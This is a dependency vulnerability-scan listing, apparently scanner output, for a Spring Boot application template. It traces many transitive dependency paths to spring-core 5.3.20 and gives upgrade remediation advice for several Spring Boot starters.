  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-actuator@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-orm@7.0.0-M9 org.springframework:spring-jdbc@5.3.22 org.springframework:spring-tx@7.0.0-M9 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
